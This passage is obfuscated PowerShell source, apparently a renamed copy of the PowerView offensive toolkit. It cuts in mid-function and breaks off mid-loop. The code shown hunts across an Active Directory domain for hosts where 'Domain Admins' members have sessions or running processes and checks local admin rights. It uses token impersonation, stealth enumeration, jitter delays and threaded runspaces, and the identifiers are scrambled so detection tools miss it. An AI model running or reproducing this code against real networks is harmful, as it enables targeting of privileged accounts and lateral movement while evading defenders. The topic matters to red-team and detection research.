ForEach ($DSsKZyhE99 in (Get-ChildItem Function:)) { | |
$lgcEyInd99.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $DSsKZyhE99.Name, $DSsKZyhE99.Definition)) | |
} | |
} | |
$Pool = [RunspaceFactory]::CreateRunspacePool(1, $TwXZTXel99, $lgcEyInd99, $Host) | |
$Pool.Open() | |
$vjFnrNGz99 = $Null | |
ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) { | |
$xqfyfnwy99 = $M.GetParameters() | |
if (($xqfyfnwy99.Count -eq 2) -and $xqfyfnwy99[0].Name -eq 'input' -and $xqfyfnwy99[1].Name -eq 'output') { | |
$vjFnrNGz99 = $M.MakeGenericMethod([Object], [Object]) | |
break | |
} | |
} | |
$Jobs = @() | |
$MqGzGCsi99 = $MqGzGCsi99 | Where-Object {$_ -and $_.Trim()} | |
Write-Verbose "[lowness] Total number of hosts: $($MqGzGCsi99.count)" | |
if ($TwXZTXel99 -ge $MqGzGCsi99.Length) { | |
$TwXZTXel99 = $MqGzGCsi99.Length | |
} | |
$jtHjScup99 = [Int]($MqGzGCsi99.Length/$TwXZTXel99) | |
$qmKgsLsF99 = @() | |
$Start = 0 | |
$End = $jtHjScup99 | |
for($i = 1; $i -le $TwXZTXel99; $i++) { | |
$List = New-Object System.Collections.ArrayList | |
if ($i -eq $TwXZTXel99) { | |
$End = $MqGzGCsi99.Length | |
} | |
$List.AddRange($MqGzGCsi99[$Start..($End-1)]) | |
$Start += $jtHjScup99 | |
$End += $jtHjScup99 | |
$qmKgsLsF99 += @(,@($List.ToArray())) | |
} | |
Write-Verbose "[lowness] Total number of threads/partitions: $TwXZTXel99" | |
ForEach ($wCiGOWAs99 in $qmKgsLsF99) { | |
$vzFEkQbq99 = [PowerShell]::Create() | |
$vzFEkQbq99.runspacepool = $Pool | |
$Null = $vzFEkQbq99.AddScript($xWxMuRFl99).AddParameter('ComputerName', $wCiGOWAs99) | |
if ($yvvaxqfq99) { | |
ForEach ($Param in $yvvaxqfq99.GetEnumerator()) { | |
$Null = $vzFEkQbq99.AddParameter($Param.Name, $Param.Value) | |
} | |
} | |
$ySjxeOag99 = New-Object Management.Automation.PSDataCollection[Object] | |
$Jobs += @{ | |
PS = $vzFEkQbq99 | |
Output = $ySjxeOag99 | |
Result = $vjFnrNGz99.Invoke($vzFEkQbq99, @($Null, [Management.Automation.PSDataCollection[Object]]$ySjxeOag99)) | |
} | |
} | |
} | |
END { | |
Write-Verbose "[lowness] Threads executing" | |
Do { | |
ForEach ($Job in $Jobs) { | |
$Job.Output.ReadAll() | |
} | |
Start-Sleep -Seconds 1 | |
} | |
While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0) | |
$WehlRvnW99 = 100 | |
Write-Verbose "[lowness] Waiting $WehlRvnW99 seconds for final cleanup..." | |
for ($i=0; $i -lt $WehlRvnW99; $i++) { | |
ForEach ($Job in $Jobs) { | |
$Job.Output.ReadAll() | |
$Job.PS.Dispose() | |
} | |
Start-Sleep -S 1 | |
} | |
$Pool.Dispose() | |
Write-Verbose "[lowness] all threads completed" | |
} | |
} | |
function clash { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.UserLocation')] | |
[CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[Alias('Unconstrained')] | |
[Switch] | |
$IpJOcJkm99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Parameter(ParameterSetName = 'UserIdentity')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$CiKxrVpf99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$VeuSFWRJ99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$wcJymsGC99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$qafsmway99, | |
[Parameter(ParameterSetName = 'UserGroupIdentity')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('GroupName', 'Group')] | |
[String[]] | |
$qUmAkowy99 = 'Domain Admins', | |
[Alias('AdminCount')] | |
[Switch] | |
$LnOcabyx99, | |
[Alias('AllowDelegation')] | |
[Switch] | |
$dVFaFIPw99, | |
[Switch] | |
$sHBhehfI99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$ezYFkWGM99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Parameter(ParameterSetName = 'ShowAll')] | |
[Switch] | |
$cFlsdGtR99, | |
[Switch] | |
$ftACZWMC99, | |
[String] | |
[ValidateSet('DFS', 'DC', 'File', 'All')] | |
$eHswXRmo99 = 'All', | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['Domain']) { $uRLeBwzL99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Unconstrained']) { $uRLeBwzL99['Unconstrained'] = $CLwptSbP99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
$hZyutCHb99 = @{ | |
'Properties' = 'samaccountname' | |
} | |
if ($PSBoundParameters['UserIdentity']) { $hZyutCHb99['Identity'] = $CiKxrVpf99 } | |
if ($PSBoundParameters['Domain']) { $hZyutCHb99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['UserDomain']) { $hZyutCHb99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserLDAPFilter']) { $hZyutCHb99['LDAPFilter'] = $wcJymsGC99 } | |
if ($PSBoundParameters['UserSearchBase']) { $hZyutCHb99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['UserAdminCount']) { $hZyutCHb99['AdminCount'] = $LnOcabyx99 } | |
if ($PSBoundParameters['UserAllowDelegation']) { $hZyutCHb99['AllowDelegation'] = $dVFaFIPw99 } | |
if ($PSBoundParameters['Server']) { $hZyutCHb99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $hZyutCHb99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $hZyutCHb99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $hZyutCHb99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $hZyutCHb99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $hZyutCHb99['Credential'] = $KWcDeQDF99 } | |
$wzcPABym99 = @() | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = @($MqGzGCsi99) | |
} | |
else { | |
if ($PSBoundParameters['Stealth']) { | |
Write-Verbose "[clash] Stealth enumeration using source: $eHswXRmo99" | |
$VgpWfQMT99 = New-Object System.Collections.ArrayList | |
if ($eHswXRmo99 -match 'File|All') { | |
Write-Verbose '[clash] Querying for file servers' | |
$NiAMlTca99 = @{} | |
if ($PSBoundParameters['Domain']) { $NiAMlTca99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['ComputerDomain']) { $NiAMlTca99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $NiAMlTca99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Server']) { $NiAMlTca99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $NiAMlTca99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $NiAMlTca99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $NiAMlTca99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $NiAMlTca99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $NiAMlTca99['Credential'] = $KWcDeQDF99 } | |
$tvJtSVWT99 = malfunctioning @FileServerSearcherArguments | |
if ($tvJtSVWT99 -isnot [System.Array]) { $tvJtSVWT99 = @($tvJtSVWT99) } | |
$VgpWfQMT99.AddRange( $tvJtSVWT99 ) | |
} | |
if ($eHswXRmo99 -match 'DFS|All') { | |
Write-Verbose '[clash] Querying for DFS servers' | |
} | |
if ($eHswXRmo99 -match 'DC|All') { | |
Write-Verbose '[clash] Querying for domain controllers' | |
$pSocivmu99 = @{ | |
'LDAP' = $True | |
} | |
if ($PSBoundParameters['Domain']) { $pSocivmu99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['ComputerDomain']) { $pSocivmu99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['Server']) { $pSocivmu99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $pSocivmu99['Credential'] = $KWcDeQDF99 } | |
$ydSAwhvK99 = Moloch @DCSearcherArguments | Select-Object -ExpandProperty dnshostname | |
if ($ydSAwhvK99 -isnot [System.Array]) { $ydSAwhvK99 = @($ydSAwhvK99) } | |
$VgpWfQMT99.AddRange( $ydSAwhvK99 ) | |
} | |
$wzcPABym99 = $VgpWfQMT99.ToArray() | |
} | |
else { | |
Write-Verbose '[clash] Querying for all computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
} | |
Write-Verbose "[clash] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[clash] No hosts found to enumerate' | |
} | |
if ($PSBoundParameters['Credential']) { | |
$RClsMfhk99 = $KWcDeQDF99.GetNetworkCredential().UserName | |
} | |
else { | |
$RClsMfhk99 = ([Environment]::UserName).ToLower() | |
} | |
if ($PSBoundParameters['ShowAll']) { | |
$BsVgIpDt99 = @() | |
} | |
elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { | |
$BsVgIpDt99 = horseshoed @UserSearcherArguments | Select-Object -ExpandProperty samaccountname | |
} | |
else { | |
$EzfMwVeQ99 = @{ | |
'Identity' = $qUmAkowy99 | |
'Recurse' = $True | |
} | |
if ($PSBoundParameters['UserDomain']) { $EzfMwVeQ99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserSearchBase']) { $EzfMwVeQ99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['Server']) { $EzfMwVeQ99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $EzfMwVeQ99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $EzfMwVeQ99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $EzfMwVeQ99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $EzfMwVeQ99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $EzfMwVeQ99['Credential'] = $KWcDeQDF99 } | |
$BsVgIpDt99 = paltriest @GroupSearcherArguments | Select-Object -ExpandProperty MemberName | |
} | |
Write-Verbose "[clash] TargetUsers length: $($BsVgIpDt99.Length)" | |
if ((-not $cFlsdGtR99) -and ($BsVgIpDt99.Length -eq 0)) { | |
throw '[clash] No users found to target' | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $BsVgIpDt99, $RClsMfhk99, $ftACZWMC99, $iLRvFQhH99) | |
if ($iLRvFQhH99) { | |
$Null = purveyed -iLRvFQhH99 $iLRvFQhH99 -Quiet | |
} | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
$ahGvgDkJ99 = Ukrainians -MqGzGCsi99 $njgHvCfM99 | |
ForEach ($fRWHEzms99 in $ahGvgDkJ99) { | |
$bnjyYveg99 = $fRWHEzms99.UserName | |
$CName = $fRWHEzms99.CName | |
if ($CName -and $CName.StartsWith('\\')) { | |
$CName = $CName.TrimStart('\') | |
} | |
if (($bnjyYveg99) -and ($bnjyYveg99.Trim() -ne '') -and ($bnjyYveg99 -notmatch $RClsMfhk99) -and ($bnjyYveg99 -notmatch '\$$')) { | |
if ( (-not $BsVgIpDt99) -or ($BsVgIpDt99 -contains $bnjyYveg99)) { | |
$HJXnNmrb99 = New-Object PSObject | |
$HJXnNmrb99 | Add-Member Noteproperty 'UserDomain' $Null | |
$HJXnNmrb99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'ComputerName' $njgHvCfM99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'SessionFrom' $CName | |
try { | |
$UvODeVNX99 = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName | |
$HJXnNmrb99 | Add-Member NoteProperty 'SessionFromName' $UvODeVNX99 | |
} | |
catch { | |
$HJXnNmrb99 | Add-Member NoteProperty 'SessionFromName' $Null | |
} | |
if ($sHBhehfI99) { | |
$Admin = (curses -MqGzGCsi99 $CName).IsAdmin | |
$HJXnNmrb99 | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin | |
} | |
else { | |
$HJXnNmrb99 | Add-Member Noteproperty 'LocalAdmin' $Null | |
} | |
$HJXnNmrb99.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') | |
$HJXnNmrb99 | |
} | |
} | |
} | |
if (-not $ftACZWMC99) { | |
$uEoImVtx99 = clickable -MqGzGCsi99 $njgHvCfM99 | |
ForEach ($User in $uEoImVtx99) { | |
$bnjyYveg99 = $User.UserName | |
$VeuSFWRJ99 = $User.LogonDomain | |
if (($bnjyYveg99) -and ($bnjyYveg99.trim() -ne '')) { | |
if ( (-not $BsVgIpDt99) -or ($BsVgIpDt99 -contains $bnjyYveg99) -and ($bnjyYveg99 -notmatch '\$$')) { | |
$mQOgITzB99 = @(huckstering -MqGzGCsi99 $njgHvCfM99)[0].IPAddress | |
$HJXnNmrb99 = New-Object PSObject | |
$HJXnNmrb99 | Add-Member Noteproperty 'UserDomain' $VeuSFWRJ99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'UserName' $bnjyYveg99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'ComputerName' $njgHvCfM99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'IPAddress' $mQOgITzB99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'SessionFrom' $Null | |
$HJXnNmrb99 | Add-Member Noteproperty 'SessionFromName' $Null | |
if ($sHBhehfI99) { | |
$Admin = curses -MqGzGCsi99 $njgHvCfM99 | |
$HJXnNmrb99 | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin | |
} | |
else { | |
$HJXnNmrb99 | Add-Member Noteproperty 'LocalAdmin' $Null | |
} | |
$HJXnNmrb99.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation') | |
$HJXnNmrb99 | |
} | |
} | |
} | |
} | |
} | |
} | |
if ($iLRvFQhH99) { | |
sepal | |
} | |
} | |
$aiSfwOXj99 = $Null | |
if ($PSBoundParameters['Credential']) { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
else { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 -Quiet | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[clash] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[clash] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
Start-Sleep -Seconds $RDTxeQJK99.Next((1-$UtMZIcCR99)*$Delay, (1+$UtMZIcCR99)*$Delay) | |
Write-Verbose "[clash] Enumerating server $GrySniik99 ($MJwBTCZE99 of $($wzcPABym99.Count))" | |
Invoke-Command -xWxMuRFl99 $OprJRfCy99 -ArgumentList $njgHvCfM99, $BsVgIpDt99, $RClsMfhk99, $ftACZWMC99, $aiSfwOXj99 | |
if ($jdzRPRXs99 -and $ezYFkWGM99) { | |
Write-Verbose "[clash] Target user found, returning early" | |
return | |
} | |
} | |
} | |
else { | |
Write-Verbose "[clash] Using threading with threads: $TwXZTXel99" | |
Write-Verbose "[clash] TargetComputers length: $($wzcPABym99.Length)" | |
$coxNBeiD99 = @{ | |
'TargetUsers' = $BsVgIpDt99 | |
'CurrentUser' = $RClsMfhk99 | |
'Stealth' = $ftACZWMC99 | |
'TokenHandle' = $aiSfwOXj99 | |
} | |
lowness -MqGzGCsi99 $wzcPABym99 -xWxMuRFl99 $OprJRfCy99 -yvvaxqfq99 $coxNBeiD99 -TwXZTXel99 $TwXZTXel99 | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function wearing { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] | |
[OutputType('PowerView.UserProcess')] | |
[CmdletBinding(DefaultParameterSetName = 'None')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DNSHostName')] | |
[String[]] | |
$MqGzGCsi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$LqbSENtU99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$nNRsMphX99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$unLXfRCu99, | |
[Alias('Unconstrained')] | |
[Switch] | |
$IpJOcJkm99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('OperatingSystem')] | |
[String] | |
$TBhTtASh99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ServicePack')] | |
[String] | |
$INxaoAdc99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('SiteName')] | |
[String] | |
$VYLOaTCe99, | |
[Parameter(ParameterSetName = 'TargetProcess')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$udRHpuIk99, | |
[Parameter(ParameterSetName = 'TargetUser')] | |
[Parameter(ParameterSetName = 'UserIdentity')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$CiKxrVpf99, | |
[Parameter(ParameterSetName = 'TargetUser')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$VeuSFWRJ99, | |
[Parameter(ParameterSetName = 'TargetUser')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$wcJymsGC99, | |
[Parameter(ParameterSetName = 'TargetUser')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$qafsmway99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('GroupName', 'Group')] | |
[String[]] | |
$qUmAkowy99 = 'Domain Admins', | |
[Parameter(ParameterSetName = 'TargetUser')] | |
[Alias('AdminCount')] | |
[Switch] | |
$LnOcabyx99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$ezYFkWGM99, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$Delay = 0, | |
[ValidateRange(0.0, 1.0)] | |
[Double] | |
$UtMZIcCR99 = .3, | |
[Int] | |
[ValidateRange(1, 100)] | |
$TwXZTXel99 = 20 | |
) | |
BEGIN { | |
$uRLeBwzL99 = @{ | |
'Properties' = 'dnshostname' | |
} | |
if ($PSBoundParameters['Domain']) { $uRLeBwzL99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['ComputerDomain']) { $uRLeBwzL99['Domain'] = $LqbSENtU99 } | |
if ($PSBoundParameters['ComputerLDAPFilter']) { $uRLeBwzL99['LDAPFilter'] = $nNRsMphX99 } | |
if ($PSBoundParameters['ComputerSearchBase']) { $uRLeBwzL99['SearchBase'] = $unLXfRCu99 } | |
if ($PSBoundParameters['Unconstrained']) { $uRLeBwzL99['Unconstrained'] = $CLwptSbP99 } | |
if ($PSBoundParameters['ComputerOperatingSystem']) { $uRLeBwzL99['OperatingSystem'] = $IRUHhYmI99 } | |
if ($PSBoundParameters['ComputerServicePack']) { $uRLeBwzL99['ServicePack'] = $hKzwkfzE99 } | |
if ($PSBoundParameters['ComputerSiteName']) { $uRLeBwzL99['SiteName'] = $ZbNKanPP99 } | |
if ($PSBoundParameters['Server']) { $uRLeBwzL99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $uRLeBwzL99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $uRLeBwzL99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $uRLeBwzL99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $uRLeBwzL99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $uRLeBwzL99['Credential'] = $KWcDeQDF99 } | |
$hZyutCHb99 = @{ | |
'Properties' = 'samaccountname' | |
} | |
if ($PSBoundParameters['UserIdentity']) { $hZyutCHb99['Identity'] = $CiKxrVpf99 } | |
if ($PSBoundParameters['Domain']) { $hZyutCHb99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['UserDomain']) { $hZyutCHb99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserLDAPFilter']) { $hZyutCHb99['LDAPFilter'] = $wcJymsGC99 } | |
if ($PSBoundParameters['UserSearchBase']) { $hZyutCHb99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['UserAdminCount']) { $hZyutCHb99['AdminCount'] = $LnOcabyx99 } | |
if ($PSBoundParameters['Server']) { $hZyutCHb99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $hZyutCHb99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $hZyutCHb99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $hZyutCHb99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $hZyutCHb99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $hZyutCHb99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ComputerName']) { | |
$wzcPABym99 = $MqGzGCsi99 | |
} | |
else { | |
Write-Verbose '[wearing] Querying computers in the domain' | |
$wzcPABym99 = deputes @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname | |
} | |
Write-Verbose "[wearing] TargetComputers length: $($wzcPABym99.Length)" | |
if ($wzcPABym99.Length -eq 0) { | |
throw '[wearing] No hosts found to enumerate' | |
} | |
if ($PSBoundParameters['ProcessName']) { | |
$mCMYMzbg99 = @() | |
ForEach ($T in $udRHpuIk99) { | |
$mCMYMzbg99 += $T.Split(',') | |
} | |
if ($mCMYMzbg99 -isnot [System.Array]) { | |
$mCMYMzbg99 = [String[]] @($mCMYMzbg99) | |
} | |
} | |
elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { | |
$BsVgIpDt99 = horseshoed @UserSearcherArguments | Select-Object -ExpandProperty samaccountname | |
} | |
else { | |
$EzfMwVeQ99 = @{ | |
'Identity' = $qUmAkowy99 | |
'Recurse' = $True | |
} | |
if ($PSBoundParameters['UserDomain']) { $EzfMwVeQ99['Domain'] = $VeuSFWRJ99 } | |
if ($PSBoundParameters['UserSearchBase']) { $EzfMwVeQ99['SearchBase'] = $qafsmway99 } | |
if ($PSBoundParameters['Server']) { $EzfMwVeQ99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $EzfMwVeQ99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $EzfMwVeQ99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $EzfMwVeQ99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $EzfMwVeQ99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $EzfMwVeQ99['Credential'] = $KWcDeQDF99 } | |
$EzfMwVeQ99 | |
$BsVgIpDt99 = paltriest @GroupSearcherArguments | Select-Object -ExpandProperty MemberName | |
} | |
$OprJRfCy99 = { | |
Param($MqGzGCsi99, $udRHpuIk99, $BsVgIpDt99, $KWcDeQDF99) | |
ForEach ($njgHvCfM99 in $MqGzGCsi99) { | |
$Up = Test-Connection -Count 1 -Quiet -MqGzGCsi99 $njgHvCfM99 | |
if ($Up) { | |
if ($KWcDeQDF99) { | |
$QMTRbeYv99 = Hamburgs -KWcDeQDF99 $KWcDeQDF99 -MqGzGCsi99 $njgHvCfM99 -ErrorAction SilentlyContinue | |
} | |
else { | |
$QMTRbeYv99 = Hamburgs -MqGzGCsi99 $njgHvCfM99 -ErrorAction SilentlyContinue | |
} | |
ForEach ($fQqvoRcu99 in $QMTRbeYv99) { | |
if ($udRHpuIk99) { | |
if ($udRHpuIk99 -Contains $fQqvoRcu99.ProcessName) { | |
$fQqvoRcu99 | |
} | |
} | |
elseif ($BsVgIpDt99 -Contains $fQqvoRcu99.User) { | |
$fQqvoRcu99 | |
} | |
} | |
} | |
} | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { | |
Write-Verbose "[wearing] Total number of hosts: $($wzcPABym99.count)" | |
Write-Verbose "[wearing] Delay: $Delay, Jitter: $UtMZIcCR99" | |
$MJwBTCZE99 = 0 | |
$RDTxeQJK99 = New-Object System.Random | |
ForEach ($njgHvCfM99 in $wzcPABym99) { | |
$MJwBTCZE99 = $MJwBTCZE99 + 1 | |
